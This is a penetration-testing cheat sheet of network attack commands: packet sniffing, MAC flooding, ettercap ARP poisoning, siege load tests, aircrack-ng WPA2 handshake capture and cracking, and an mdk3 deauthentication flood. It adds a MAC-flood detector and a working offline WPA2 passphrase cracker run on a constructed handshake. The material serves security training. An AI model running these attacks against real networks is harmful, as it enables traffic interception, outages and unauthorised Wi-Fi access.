Pentest Tips

Network Based

Sniffing

Packet sniffing with tcpdump (captures every protocol seen on the interface, not only TCP; needs root or CAP_NET_RAW):

# Basic output: one summary line per packet
tcpdump -i <interface>
# Print each packet's payload as ASCII (handy for cleartext protocols); -n skips reverse DNS lookups
tcpdump -A -n -i <interface>
# Write the raw packets to a pcap file for later analysis (e.g. in Wireshark); packets are not printed to the terminal
tcpdump -i <interface> -w /tmp/tcpdump.pcap

File transfer

Over SSH:

# SSH Local folder to remote
scp -r <local folder> <username>@<IP>:/<pathToFolder>

# SSH Remote folder to local
scp -r <username>@<IP>:/<pathToFolder> .

Mac Flooding (DOS)

Dangerous and noisy. macof sprays frames with random source MACs until the switch's CAM table overflows and it falls back to flooding frames out every port (hub mode), which exposes other hosts' traffic. A SOC detects this easily, and port security will shut down the attacking port, taking every host behind it offline: that outage is the "DOS" in the heading.

macof -i <interface>
# ARP poisoning MITM with ettercap (a different technique from CAM flooding: it redirects traffic through the attacker by spoofing ARP replies).
# With no TARGET given it poisons every host on the subnet; restrict it with ettercap's TARGET syntax (see man ettercap),
# and use -M arp:remote if you need to see traffic between the victim and the gateway.
# Does not work on switches with Dynamic ARP Inspection (ARP validation) enabled.
ettercap -T -i <interface> -M arp
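The reason a CAM flood is "easily detected": the attack shows up as thousands of never-before-seen source MAC addresses on one switch port within seconds, whereas a normal access port carries a handful. The following is an added example of that detection check, not code from the original page; the frame records are constructed, and the window and threshold values are assumptions to be tuned to the port's normal host count.

```python
# Added example (not from the original page): a sliding-window check for a
# macof-style CAM table flood, seen as an explosion of distinct source MACs on
# one switch port.  Frame records are CONSTRUCTED; window/threshold are assumptions.
import random
from collections import defaultdict, deque
from typing import Iterable, List, Tuple

# (timestamp_seconds, switch_port, source_mac)
Frame = Tuple[float, str, str]

WINDOW_SECONDS = 10.0            # assumption: look-back window
MAX_DISTINCT_MACS_PER_WINDOW = 50  # assumption: tune to the port's normal host count


def detect_mac_floods(frames: Iterable[Frame], window: float = WINDOW_SECONDS,
                      threshold: int = MAX_DISTINCT_MACS_PER_WINDOW) -> List[Tuple[float, str, int]]:
    """Return (timestamp, port, distinct_macs) each time a port's count of distinct
    source MACs inside the sliding window first exceeds the threshold."""
    recent = defaultdict(deque)                      # port -> deque of (ts, mac) in window
    counts = defaultdict(lambda: defaultdict(int))   # port -> mac -> occurrences in window
    alerts: List[Tuple[float, str, int]] = []
    alerted = set()
    for ts, port, mac in sorted(frames):
        q = recent[port]
        # Expire frames that fell out of the window, dropping MACs no longer seen.
        while q and ts - q[0][0] > window:
            old_ts, old_mac = q.popleft()
            counts[port][old_mac] -= 1
            if counts[port][old_mac] == 0:
                del counts[port][old_mac]
        q.append((ts, mac))
        counts[port][mac] += 1
        distinct = len(counts[port])
        if distinct > threshold and port not in alerted:
            alerts.append((ts, port, distinct))
            alerted.add(port)            # one alert per port per crossing
        elif distinct <= threshold:
            alerted.discard(port)        # re-arm once the port calms down
    return alerts


def constructed_frames() -> List[Frame]:
    """CONSTRUCTED traffic: two normal access ports plus a macof flood on a third."""
    rng = random.Random(1)
    frames: List[Frame] = []
    normal = {"Gi1/0/1": ["00:11:22:33:44:%02x" % i for i in range(5)],
              "Gi1/0/2": ["aa:bb:cc:dd:ee:%02x" % i for i in range(3)]}
    for tick in range(600):                          # 60 s of chatter, 10 frames/s/port
        for port, macs in normal.items():
            frames.append((tick / 10.0, port, rng.choice(macs)))
    for i in range(2000):                            # flood: 2000 random MACs in 2 s
        mac = ":".join("%02x" % rng.randrange(256) for _ in range(6))
        frames.append((20.0 + i / 1000.0, "Gi1/0/3", mac))
    return frames


if __name__ == "__main__":
    for ts, port, n in detect_mac_floods(constructed_frames()):
        print(f"t={ts:.3f}s port={port}: {n} distinct source MACs in {WINDOW_SECONDS:.0f}s window")
```

In practice the input would come from the switch's MAC address table notifications, sFlow/NetFlow, or a span-port capture; the logic stays the same. The alert fires on Gi1/0/3 within the first 100 ms of the flood and never on the two normal ports.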

Load Testing

# 100 concurrent simulated users against the URL; -v prints each request/response line.
# Bound the run with -t <time> (e.g. -t 30S) or -r <repetitions>, otherwise siege uses the default from its config.
siege -v -c 100 <url>

# Same, but authenticated: the session cookie is sent with every request
siege -v -c 100 -H 'Cookie: name=value' <url>

Wifi Cracking

WPA/WPA2-PSK: capture the 4-way handshake between the AP and a client, then guess the passphrase offline against it.

# List wireless interfaces (and the processes that may interfere with monitor mode)
airmon-ng

# Put the interface into monitor mode, optionally locked to a channel. This creates a monitor interface (<interface>mon on current releases, mon0 on old ones); it does not start a capture.
airmon-ng start <interface> <channel>

# Capture on the target's channel and BSSID, writing psk-01.cap. A client must (re)associate while you listen for the handshake to appear.
airodump-ng -c <channel> --bssid <bssid> -w psk <monitor interface>

# Crack the passphrase from the captured handshake with a wordlist (add -b <bssid> if the capture holds more than one network)
aircrack-ng -w <wordlist> psk*.cap

# Take the interface out of monitor mode when done
airmon-ng stop <monitor interface>
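What aircrack-ng does with the handshake, as an added example that is not the page's or the aircrack-ng project's code: for each wordlist entry it derives the PMK with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt, which is why each guess is expensive and why rainbow tables only work per SSID), expands it to the PTK with the 802.11 PRF over both MACs and both nonces, and checks whether the Key Confirmation Key reproduces the MIC on EAPOL message 2. The handshake below is constructed (fixed MACs, nonces, a minimal EAPOL-Key frame and a MIC computed with a known passphrase) so the script runs offline; the network name, addresses and wordlist are invented.

```python
# Added example (not from the original page or aircrack-ng): the offline WPA2-PSK
# computation run against a captured 4-way handshake.  The handshake is CONSTRUCTED
# with a known passphrase; substitute values from a real capture to use it.
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 HMAC rounds are the per-guess cost that makes cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0.. concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(5)  # 5 * 20 bytes covers the 64 bytes needed
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that keys the EAPOL MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the frame, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_msg2: bytes  # EAPOL-Key message 2 with its 16-byte MIC field zeroed
    mic: bytes         # the MIC the client actually sent


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first passphrase whose derived KCK reproduces the captured MIC, else None."""
    for guess in wordlist:
        kck = derive_kck(pmk_from_passphrase(guess, hs.ssid), hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic):
            return guess
    return None


def build_sample_handshake(passphrase: str = "correct horse") -> Handshake:
    """CONSTRUCTED handshake: invented SSID/MACs/nonces and a minimal EAPOL-Key message 2
    whose MIC is computed with the real passphrase, standing in for a client's frame."""
    ssid = "ExampleNet"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # RSN key descriptor (type 2): key info, key length, replay counter, nonce,
    # IV, RSC, ID, MIC (zeroed for the MIC computation), key data length.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x02" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    # 802.1X header: version 1, type 3 (EAPOL-Key), body length.
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


if __name__ == "__main__":
    hs = build_sample_handshake()
    print(crack(hs, ["password", "letmein", "correct horse", "qwerty"]))
```

The PBKDF2 step can be checked against the IEEE 802.11i Annex test vector (passphrase "password", SSID "IEEE" gives PMK f42c6fc5...a12e). Everything after the PMK is cheap, which is why hashcat and aircrack-ng spend their time in PBKDF2 and why a long random passphrase on a WPA2 network is not crackable this way in practice.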

Wifi Deauth Flood DOS

Deauthentication frames are unauthenticated management frames, so on a network without 802.11w (Protected Management Frames) every client honours a forged one; flooding them keeps all clients off the AP for as long as the flood runs. Noisy: any wireless IDS flags this immediately.

# Put wlan0 into monitor mode (creates wlan0mon on current airmon-ng, mon0 on older versions)
airmon-ng start wlan0
# mdk3 'd' mode: deauthentication/disassociation amok. Check `mdk3 --help d` for the target and whitelist options of your version.
mdk3 <monitor interface> d -i <essid>

Last updated 2 years ago

Guide:

Geeks For Geeks